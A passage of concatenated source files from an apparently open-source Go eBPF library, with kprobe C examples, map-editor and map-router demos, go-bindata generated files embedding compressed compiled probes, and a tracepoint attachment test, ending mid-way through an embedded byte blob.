* WARNING: it has to be the first map defined in the `maps/maps_router`
* section since it is referred to as map #0 in maps_router.
*/
struct bpf_map_def SEC("maps/maps_router") routed_cache = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
struct bpf_map_def SEC("maps/maps_router") maps_router = {
.type = BPF_MAP_TYPE_HASH_OF_MAPS,
.key_size = sizeof(u32),
.max_entries = 10,
.inner_map_idx = 0, /* map_fd[0] is routed_cache */
};
SEC("kprobe/vfs_mkdir")
int kprobe_vfs_mkdir(void *ctx)
{
bpf_printk("(prog2) writing 42 in shared_cache1 at key 1 ...\n");
// Update the shared cache
u32 key = 1;
u32 val = 42;
bpf_map_update_elem(&shared_cache1, &key, &val, BPF_ANY);
// Update the routed map
val = 500;
void *routed_map = bpf_map_lookup_elem(&maps_router, &key);
if (routed_map == NULL)
{
return 0;
}
bpf_printk("(prog2) writing 500 in router_map at key 1 ...\n");
bpf_map_update_elem(routed_map, &key, &val, BPF_ANY);
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/map_rewrite_vs_map_router/demo.go<|end_filename|>
package main
import (
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"github.com/DataDog/ebpf"
"github.com/DataDog/ebpf/manager"
)
func demoMapEditor() error {
logrus.Println("MAP EDITOR DEMO")
// Select the shared map to give it to m2
sharedCache1, found, err := m1.GetMap("shared_cache1")
if err != nil || !found {
return errors.Wrap(err,"couldn't find shared_cache1 in m1")
}
if err = dumpSharedMap(sharedCache1); err != nil {
return err
}
// Give shared_cache1 to m2 through a map editor
options := manager.Options{MapEditors: map[string]*ebpf.Map{
"shared_cache1": sharedCache1,
}}
// Initialize m2, edit shared_cache1 and start it
if err = m2.InitWithOptions(recoverAsset("/prog2.o"), options); err != nil {
return err
}
if err = m2.Start(); err != nil {
return err
}
if err = trigger(); err != nil {
return err
}
return dumpSharedMap(sharedCache1)
}
func demoMapRouter() error {
logrus.Println("MAP ROUTER DEMO")
// Select the shared map to give it to m2
sharedCache2, found, err := m1.GetMap("shared_cache2")
if err != nil || !found {
return errors.Wrap(err, "couldn't find shared_cache2 in m1")
}
if err = dumpSharedMap(sharedCache2); err != nil {
return err
}
// Give shared_cache2 to m2 through a map router
router := manager.MapRoute{RoutingMapName: "maps_router", Key: uint32(1), Map: sharedCache2}
if err := m2.UpdateMapRoutes(router); err != nil {
return err
}
if err = trigger(); err != nil {
return err
}
return dumpSharedMap(sharedCache2)
}
<|start_filename|>kernel_version_unsupported.go<|end_filename|>
// +build !linux
package ebpf
import (
"fmt"
"runtime"
)
var ErrNonLinux = fmt.Errorf("unsupported platform %s/%s", runtime.GOOS, runtime.GOARCH)
func KernelVersionFromReleaseString(releaseString string) (uint32, error) {
return 0, ErrNonLinux
}
func CurrentKernelVersion() (uint32, error) {
return 0, ErrNonLinux
}
<|start_filename|>manager/examples/map_rewrite_vs_map_router/utils.go<|end_filename|>
package main
import (
"bytes"
"encoding/binary"
"github.com/DataDog/ebpf"
"io"
"os"
"unsafe"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
// ByteOrder - host byte order
var ByteOrder binary.ByteOrder
func init() {
ByteOrder = getHostByteOrder()
}
// getHostByteOrder - Returns the host byte order
func getHostByteOrder() binary.ByteOrder {
var i int32 = 0x01020304
u := unsafe.Pointer(&i)
pb := (*byte)(u)
b := *pb
if b == 0x04 {
return binary.LittleEndian
}
return binary.BigEndian
}
// recoverAsset - Recover ebpf asset
func recoverAsset(asset string) io.ReaderAt {
buf, err := Asset(asset)
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Creates and then removes a tmp folder to trigger the probes
func trigger() error {
logrus.Println("Generating events to trigger the probes ...")
// Creating a tmp directory to trigger the probes
tmpDir := "/tmp/test_folder"
logrus.Printf("creating %v", tmpDir)
err := os.MkdirAll(tmpDir, 0666)
if err != nil {
return err
}
// Removing the tmp directory
return os.RemoveAll(tmpDir)
}
// dumpSharedMap - Dumps the content of the provided map at the provided key
func dumpSharedMap(sharedMap *ebpf.Map) error {
var key, val uint32
entries := sharedMap.Iterate()
for entries.Next(&key, &val) {
// Order of keys is non-deterministic due to randomized map seed
logrus.Printf("%v contains %v at key %v", sharedMap, val, key)
}
return entries.Err()
}
<|start_filename|>manager/examples/map_rewrite_vs_map_router/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/prog1.o
// ebpf/bin/prog2.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProg1o = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x56\x4d\x68\xd4\x40\x14\x7e\xd9\xdd\x76\xeb\xb6\x68\x2b\x14\x6a\xe8" +
"\x21\xa0\x42\xbd\xa4\xdd\x15\x8b\x87\x0a\x65\xa1\xeb\xa5\x88\x94\x7a\x13\x62\x9a\x4d\xdd\xa5\xdd\x1f\x92\xb4\x58" +
"\x57\xb0\x17\xa1\x47\x41\xc4\x9b\xa2\x5e\xbc\x7a\xda\x5e\xc4\xab\xe0\xa5\x47\x8f\x3d\x0a\x5e\xfc\x39\xe8\xa1\x38" +
"\xf2\x26\x6f\x92\x74\x92\x18\x29\x28\x88\x3e\xc8\xce\xcc\x37\xef\xcd\xfb\xf6\xe5\x7b\xb3\x7b\x77\x61\xb1\x96\x53" +
"\x14\x10\xa6\xc0\x57\x08\x57\xa1\xed\x0c\x85\xf3\x79\xfa\x3c\x01\x0a\xf4\x15\xe0\xfe\x96\x7a\xc0\x10\x7d\xfd\xcc" +
"\xf7\x29\xe6\x00\x0e\x18\x63\x13\xd2\x61\xf7\xc0\xf7\xbf\x06\x63\x7c\x8d\xfb\x9a\xdd\xea\xe2\xdc\xdb\x2a\x41\x4f" +
"\x7d\xcf\x04\x6e\x5a\x0d\x1b\xe7\x65\xad\xe9\xf6\xd4\xfd\x00\x77\x1b\xa6\x83\x73\xbb\x6e\x58\x3d\xf5\x5d\x80\x4f" +
"\x75\x9d\x0e\xce\x6f\x96\xcf\x69\x3d\x75\xcf\xe7\xf3\x94\xf8\x28\x00\x7b\x8c\xb1\x7e\x0e\x40\x23\x1e\x83\x00\x30" +
"\x00\xe3\x7c\xbf\x4f\x3c\x5d\xf5\x33\x13\xeb\x8d\x12\xc0\x9a\xfa\x31\x38\xbf\xed\x99\x4d\x9c\xb7\x5d\xed\x6c\x32" +
"\x4f\xab\x73\x54\x9e\x66\xde\xcf\x9f\xc4\xf7\x74\x84\xef\xef\xa8\x6f\xe5\x2f\xa9\x6f\xe5\x0f\xd4\xb7\x4f\x75\x7c" +
"\x48\x23\xd2\x2e\xd0\x53\x8a\x75\xc5\xbf\x6d\xff\x6b\x93\x6d\xa8\x45\xd4\x21\x6a\x15\x75\x8a\x5a\xc6\xfb\x0c\x7b" +
"\x12\xfb\x31\x79\xdf\xea\x60\x2f\x60\x1f\x6c\x94\xb2\xcf\xab\x64\x9c\x57\x39\x7c\xde\xe5\xab\x8b\x00\xdf\x19\x63" +
"\x4f\x3e\x28\x30\x21\xf1\xe5\x6d\x1a\xdd\x28\x44\x1e\xfc\x0d\x18\xf5\xe1\x51\xe1\x7f\x7b\x09\x86\xee\x0c\x2b\x23" +
"\xd8\x7b\xf4\x08\xdb\xcf\x65\xd7\xe7\x3a\x3f\xfa\x13\x93\xf1\x97\xfc\x33\x0f\x6f\x24\xfc\x11\xe1\x5d\xe9\xde\xbb" +
"\x4f\xf8\x94\x94\x73\x8b\xf0\xbd\x04\x2e\x79\xc8\xc7\xb0\x05\x00\x18\x83\xf0\xc7\xae\x40\xe3\x1c\xc7\x8f\xc5\x70" +
"\xac\xc3\xc9\xc8\x39\xe2\x3b\xbf\xe2\xfe\x03\x01\x3e\x49\x7c\x9f\x73\x7c\x30\x86\x6b\xb4\x56\xa8\x97\xb6\x95\x70" +
"\x3d\x8c\x7e\x91\x7d\x1e\xad\x7b\xf6\x2d\x0f\xf4\xea\x72\x4d\xc7\xc9\x9a\x63\x7b\x5d\xa7\xb3\x62\x1b\x9b\xab\xae" +
"\xd1\x5a\xab\x37\x1d\xd0\x1d\x7b\x3d\xc0\xa7\x43\xdc\xd8\xb4\x1d\xb7\xd9\x69\x83\xb1\xde\xb4\xec\xb6\x6b\x73\x4f" +
"\xdd\x6e\x18\xab\x8e\xd9\xb2\x81\x4b\x48\xb7\x40\x77\x3d\xc7\x33\x57\x40\x77\xb7\x5a\x7c\xac\x2e\xd7\x60\xb1\x5a" +
"\x9d\x31\x66\x41\x77\x3a\x75\xd3\x33\xd1\xa5\xac\x97\x67\x7d\xf8\x82\x3f\x9c\x87\x96\xd9\x75\xa7\x0f\x49\xd0\xdf" +
"\xa9\xc4\x77\xca\xf1\xf7\x72\x14\xab\xf3\xf7\x19\xb7\xdd\xa2\x3f\xbe\x95\x70\xf9\x3f\x8e\x12\xad\x6d\xc4\xe6\x53" +
"\xf2\x15\xa4\xf5\x54\x46\xbc\xdc\x0b\x43\x92\xdf\x19\x80\x88\xba\x42\xdb\x21\xfe\x42\x1f\xc7\xe9\x7b\x8a\x78\xd1" +
"\x87\xbb\x94\x5f\xae\x81\x46\xc0\xa4\xf2\x73\xfe\x8f\x53\xe2\xe7\x0a\xbf\x16\xbf\x4d\xf1\x15\x09\xbf\x41\x2d\xf0" +
"\x40\xc2\x83\xfb\x83\xc6\x5a\x4a\xfe\x2f\x03\xc9\xf9\xe4\xf7\x77\x29\x25\xfe\x5b\x4a\xbc\xbc\xf6\x12\xce\x44\x3b" +
"\xa0\xf8\x53\x19\xf9\x8b\x29\xf1\xe3\x24\x08\x2d\x23\x7e\x89\x30\xf9\x9a\xba\x48\xf1\x33\x12\x2e\xeb\xe7\x4a\x8a" +
"\x7e\x5e\x90\x7e\x44\xbd\x51\x3f\x23\x09\xfa\x59\x4f\xc8\x8d\xd6\x10\xfc\x23\xf7\x51\x31\x12\x2f\xee\xfb\x1f\x01" +
"\x00\x00\xff\xff\x1e\xb1\xa1\x42\x48\x0c\x00\x00")
func bindataProg1oBytes() ([]byte, error) {
return bindataRead(
_bindataProg1o,
"/prog1.o",
)
}
func bindataProg1o() (*asset, error) {
bytes, err := bindataProg1oBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/prog1.o",
size: 3144,
md5checksum: "",
mode: os.FileMode(436),
modTime: time.Unix(1594297957, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
var _bindataProg2o = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x56\x3f\x68\x14\x4f\x14\xfe\xf6\xee\x7e\x77\xf7\x8b\xf1\x2f\x08\xc9" +
"\x91\x62\x2c\x04\xb5\x98\xdc\x1d\x1a\x02\x36\xe1\xc0\xc4\x22\x45\x94\x14\x5a\xc8\xb2\xb9\x6c\x92\xe3\x72\x7f\xdc" +
"\x5b\xa3\xc9\x05\xb4\x30\x8d\xd8\x58\x08\x16\x82\xa8\x20\x69\xac\x13\x30\x70\x29\x53\x5a\xa6\x4c\x19\xb0\x89\x20" +
"\xd8\xb9\xf2\x66\x67\x6e\xd7\xc9\xee\x1d\xd6\xe6\xc1\x66\xde\x7c\x3b\xdf\xbc\xd9\x6f\xdf\x7d\x9b\xa7\xb7\xa6\x27" +
"\x13\x86\x01\x15\x06\x7e\x22\x98\x05\xb1\x99\x0d\xf2\x09\xf9\xf7\x2c\x0c\x6c\x19\xc0\x00\x80\x6a\xee\xc8\x23\x74" +
"\xc8\x00\xec\x55\x56\xa0\x9c\x71\xce\xdb\xb9\xc3\x2e\xbe\x64\x17\x18\xe5\x96\xcb\xaa\xed\xdc\x41\x17\xb7\x1c\x7b" +
"\x9e\x72\xb3\x6c\x95\xdb\xb9\xfd\x2e\x7e\xbd\xc8\x2a\x94\xd7\x59\x6b\xa9\x9d\xfb\xea\xe3\x19\xe0\xb1\x53\x71\x29" +
"\xaf\xd4\x17\x59\x7b\x6d\xcf\xc7\xb3\xc0\x95\xa6\xd3\xa0\x7c\xb1\x78\x95\xb5\x5f\xec\x0a\xbc\xf3\xde\x3f\x73\xc6" +
"\x00\x76\x3d\xcf\xdb\x4a\x00\x45\x00\x1b\x00\xd2\x80\x38\x3f\x3d\x6f\x39\xb7\x23\xd6\xd3\xfc\x9a\x98\x6f\xfb\xfc" +
"\x4f\x92\x9f\x06\x76\x3c\xcf\xeb\x7c\x94\xf3\x24\xb0\xed\x79\xde\x90\x26\x56\x67\xce\x1f\xb7\x52\xfe\x48\x75\x12" +
"\x72\xdf\x1f\x46\xb0\x6f\x1c\x6f\x03\xfe\x79\x3a\x69\x7f\x7e\x31\x3d\x0c\xb5\x9e\x15\x18\xa7\x9c\xf3\x01\x84\x75" +
"\x6d\x32\x4b\xe8\xc1\xaa\xf6\x6a\x58\xd7\xc6\x23\xd7\xa6\xdc\x31\x6b\x56\x58\xd7\x1b\xf9\x3c\xf3\xf5\x63\x8e\xd2" +
"\x55\xe9\xd8\x4b\xb7\x7c\x48\xb7\xce\x07\x79\x3f\x11\xad\x4b\xc7\x8a\xd1\x41\x3e\xef\xeb\x6e\xbf\x01\x29\x79\x0d" +
"\x44\xf4\xdd\xbf\x1c\x27\xda\xc4\xc7\x69\xa9\x0b\x4e\xb4\xe9\x19\xe4\x89\xe4\x87\xe4\x99\xe4\x97\xe4\xa9\xe4\xa7" +
"\xe4\xb9\xe4\xb7\xe4\xc9\xe4\xc7\xe4\xd9\xe4\xd7\xba\x96\x3a\x9f\xbc\x83\x7c\x83\xbc\x85\x7c\xa5\xa9\xb1\xa7\x66" +
"\xa6\xf1\xcb\xf3\xbc\x77\xdf\x0c\x0c\x69\x7b\x09\xcb\x0b\xdf\x48\x85\x2e\xfa\xbe\x9c\x0b\xd6\xaa\xd4\x58\xbb\x8b" +
"\xec\xfa\x29\x63\x90\xbc\x4b\x5e\x2a\x26\x12\xfd\x9f\xdf\x15\xdb\x7f\xf7\x74\xdc\xb7\xb7\x24\xf2\x11\x7b\x24\x91" +
"\x3c\x86\xcd\x00\x38\x8f\xe0\x23\xa8\x7a\x6f\x4a\xe0\xff\x1f\xc3\xe9\xfc\x17\x42\xfb\xa8\xb3\xde\x14\xeb\xd3\x18" +
"\x91\xfe\xaf\xc6\x45\x89\xab\x50\xf8\x67\x81\xff\x77\x0c\x57\x1f\x69\x1a\xa8\xfa\x78\x68\x9e\xa1\x75\xa1\x65\xe2" +
"\x14\xdc\xb5\x9f\xb8\xe0\xa5\xd9\x49\x4e\x49\xb5\xe9\x34\xe6\x6c\x73\x65\xa1\x65\xd6\xaa\xf3\x15\x07\xdc\xb1\x97" +
"\x7d\x70\x34\x00\x6b\x56\xb3\x35\x4a\x7f\x4c\xff\x85\xc3\x5c\xb1\x9d\x56\xa5\x51\x87\xb9\x5c\x29\xdb\xf5\x96\x2d" +
"\x78\xdc\x5e\x32\x17\x1c\xab\x66\x43\x2c\x93\x8d\x05\xd1\x3a\xbc\x0c\xde\x72\x1d\xd7\x9a\x03\x6f\xad\xd6\xc4\x58" +
"\x9a\x9d\x04\x77\x1a\xf3\x96\x6b\xd1\xbd\x02\x2f\x8c\x61\xba\x54\xca\x9b\x45\xbf\xe2\x1f\xed\x19\xfd\x5e\xff\x36" +
"\xd6\x95\x0e\x5a\x1c\x66\xfc\xf1\x8b\x86\xeb\xff\x03\x19\xf2\x4a\x6b\xf8\x44\x4c\xbd\x94\x36\xbf\xdc\x87\xaf\xf7" +
"\x72\x56\x5b\x77\x49\xbe\x67\x3d\xb6\xe5\xf9\x99\x9c\x9f\x91\xcf\xa9\xf8\xea\x77\xb4\x19\xee\x85\x50\x3c\x93\x75" +
"\x47\x8c\xde\xe7\x1f\x8b\xe1\xbf\x95\xc0\x78\xa2\x37\xff\x95\xe4\x17\x35\xfc\x40\xb6\x76\x53\xc3\xbb\xbf\x7f\x39" +
"\xde\x89\xa9\x3f\x93\x8e\xae\xa7\xbf\xbf\xdb\x31\xfc\xd9\x18\xbe\x3e\x7f\x19\xb1\x27\xc5\x3d\xc9\x1f\xee\x53\x3f" +
"\x13\xc3\x7f\x28\xf9\xac\x0f\xff\x81\xc4\x74\xbb\x7a\x23\xf9\x79\x0d\xd7\xfb\xe7\x7e\x4c\xff\xec\xcb\xfe\x51\x7a" +
"\x53\xff\x0c\x46\xf4\xcf\xf3\x88\xda\x14\x7b\xb2\xfe\x51\xe8\xdc\xa9\x10\x5f\xf9\xf5\xef\x00\x00\x00\xff\xff\x22" +
"\xe6\xc7\x14\x68\x0c\x00\x00")
func bindataProg2oBytes() ([]byte, error) {
return bindataRead(
_bindataProg2o,
"/prog2.o",
)
}
func bindataProg2o() (*asset, error) {
bytes, err := bindataProg2oBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/prog2.o",
size: 3176,
md5checksum: "",
mode: os.FileMode(436),
modTime: time.Unix(1594297957, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/prog1.o": bindataProg1o,
"/prog2.o": bindataProg2o,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"prog1.o": {Func: bindataProg1o, Children: map[string]*bintree{}},
"prog2.o": {Func: bindataProg2o, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>example_program_test.go<|end_filename|>
// +build linux
package ebpf_test
import (
"context"
"fmt"
"io/ioutil"
"os"
"strconv"
"time"
"strings"
"github.com/DataDog/ebpf"
"github.com/DataDog/ebpf/asm"
"github.com/DataDog/ebpf/perf"
"golang.org/x/sys/unix"
)
// getTracepointID returns the system specific ID for the tracepoint sys_enter_open.
func getTracepointID() (uint64, error) {
data, err := ioutil.ReadFile("/sys/kernel/debug/tracing/events/syscalls/sys_enter_open/id")
if err != nil {
return 0, fmt.Errorf("failed to read tracepoint ID for 'sys_enter_open': %v", err)
}
tid := strings.TrimSuffix(string(data), "\n")
return strconv.ParseUint(tid, 10, 64)
}
// Example_program demonstrates how to attach an eBPF program to a tracepoint.
// The program will be attached to the sys_enter_open tracepoint and print out the integer
// 123 every time the syscall is used.
func Example_program() {
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
defer cancel()
events, err := ebpf.NewMap(&ebpf.MapSpec{
Type: ebpf.PerfEventArray,
Name: "pureGo",
})
if err != nil {
panic(fmt.Errorf("could not create event map: %v\n", err))
}
defer events.Close()
rd, err := perf.NewReader(events, os.Getpagesize())
if err != nil {
panic(fmt.Errorf("could not create event reader: %v", err))
}
defer rd.Close()
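	// Consume records from the perf ring buffer in the background and print
	// them until the context expires or the reader is closed.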
go func() {
for {
select {
case <-ctx.Done():
return
default:
}
record, err := rd.Read()
if err != nil {
if perf.IsClosed(err) {
return
}
panic(fmt.Errorf("could not read from reader: %v", err))
}
fmt.Println(record)
}
}()
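	// Build the eBPF program by hand: store the integer 123 on the stack and
	// emit it through the perf event map on every invocation.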
ins := asm.Instructions{
// store the integer 123 at FP[-8]
asm.Mov.Imm(asm.R2, 123),
asm.StoreMem(asm.RFP, -8, asm.R2, asm.Word),
		// load registers with the arguments for the call to FnPerfEventOutput
asm.LoadMapPtr(asm.R2, events.FD()),
asm.LoadImm(asm.R3, 0xffffffff, asm.DWord),
asm.Mov.Reg(asm.R4, asm.RFP),
asm.Add.Imm(asm.R4, -8),
asm.Mov.Imm(asm.R5, 4),
// call FnPerfEventOutput
asm.FnPerfEventOutput.Call(),
// set exit code to 0
asm.Mov.Imm(asm.R0, 0),
asm.Return(),
}
prog, err := ebpf.NewProgram(&ebpf.ProgramSpec{
Name: "sys_enter_open",
Type: ebpf.TracePoint,
License: "GPL",
Instructions: ins,
})
if err != nil {
panic(fmt.Errorf("could not create new ebpf program: %v", err))
}
defer prog.Close()
tid, err := getTracepointID()
if err != nil {
panic(fmt.Errorf("could not get tracepoint id: %v", err))
}
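	// Open a perf event for the tracepoint, then enable it and attach the eBPF
	// program to it with the PERF_EVENT_IOC_ENABLE and PERF_EVENT_IOC_SET_BPF ioctls.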
attr := unix.PerfEventAttr{
Type: unix.PERF_TYPE_TRACEPOINT,
Config: tid,
Sample_type: unix.PERF_SAMPLE_RAW,
Sample: 1,
Wakeup: 1,
}
pfd, err := unix.PerfEventOpen(&attr, -1, 0, -1, unix.PERF_FLAG_FD_CLOEXEC)
if err != nil {
panic(fmt.Errorf("unable to open perf events: %v", err))
}
if _, _, errno := unix.Syscall(unix.SYS_IOCTL, uintptr(pfd), unix.PERF_EVENT_IOC_ENABLE, 0); errno != 0 {
panic(fmt.Errorf("unable to enable perf events: %v", err))
}
if _, _, errno := unix.Syscall(unix.SYS_IOCTL, uintptr(pfd), unix.PERF_EVENT_IOC_SET_BPF, uintptr(prog.FD())); errno != 0 {
panic(fmt.Errorf("unable to attach bpf program to perf events: %v", err))
}
<-ctx.Done()
if _, _, errno := unix.Syscall(unix.SYS_IOCTL, uintptr(pfd), unix.PERF_EVENT_IOC_DISABLE, 0); errno != 0 {
panic(fmt.Errorf("unable to disable perf events: %v", err))
}
}
<|start_filename|>manager/examples/activated_probes/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
SEC("kprobe/vfs_mkdir")
int kprobe_vfs_mkdir(void *ctx)
{
bpf_printk("mkdir (vfs hook point)\n");
return 0;
};
SEC("kprobe/utimes_common")
int kprobe_utimes_common(void *ctx)
{
bpf_printk("utimes_common\n");
return 0;
};
SEC("kprobe/vfs_opennnnnn")
int kprobe_open(void *ctx)
{
bpf_printk("vfs_open\n");
return 0;
};
SEC("kprobe/exclude")
int kprobe_exclude(void *ctx)
{
bpf_printk("exclude\n");
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/testdata/Makefile<|end_filename|>
LLVM_PREFIX ?= /usr/bin
CLANG ?= $(LLVM_PREFIX)/clang
all: rewrite.elf
clean:
-$(RM) *.elf
%.elf : %.c
$(CLANG) -target bpf -O2 -g \
-Wall -Werror \
-c $< -o $@
<|start_filename|>manager/examples/programs/uprobe/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\x3d\x6f\x13\x41\x10\x7d\x6b\x9b\xc4\x24\x29\x6c\xaa\xe4\x02\x92" +
"\xc5\x0f\x58\x48\x0a\x6a\xcb\x12\xa6\x49\x11\xa1\x48\x94\xa7\xb5\x6f\x21\x16\xbe\xbb\xe8\xee\xf8\x74\x24\x2a\xfa" +
"\x34\x48\x74\x88\x5f\xe1\x92\xbf\xe2\x12\x89\x06\x2a\x10\x48\x2c\xda\xcd\xae\x6f\x99\xdc\xe9\x32\xd2\x7a\x67\xde" +
"\xce\x9b\x79\x3b\x5e\xdd\xbb\x87\x47\xe3\x16\x63\x70\xc6\xf0\x13\x65\x54\xda\x45\xab\xf4\x87\xf6\x77\x07\x0c\x4b" +
"\x06\x44\x5b\xc0\xf3\xe0\x97\xd2\xe8\x2e\x03\x06\x91\x2c\xb4\x2f\xa7\x85\x5c\x04\xdf\x4b\x7c\x9a\xc6\xda\x8f\x45" +
"\x12\x2d\x82\xaf\x6b\x3c\x91\xaf\x06\xda\x9f\x88\xfc\x74\x11\xac\x0c\xbe\xb4\x22\xf2\xe0\xb7\x89\xbf\x7c\xbe\x8c" +
"\x37\x19\xb0\x52\x4a\x2d\x5b\xc0\x3e\x80\xf7\x00\x36\x74\xbe\xd5\xf6\x81\xe8\xd6\xb5\x75\x5d\xdd\x5b\xf7\xd5\xda" +
"\xb4\xae\x68\x0b\x8f\x8e\x8f\x80\xbf\x4a\xa9\x4f\xdf\x18\x76\x09\xcf\xb4\xf7\x0f\x3a\xde\xea\x02\xe8\x5d\xc2\x3d" +
"\x97\xff\xf6\x31\xba\xe7\xdb\x6c\x47\xdf\xc9\x2e\x67\x1f\x2b\xe6\x49\xed\xd8\x94\xfe\xa1\xaa\xce\xda\x68\x5f\xc1" +
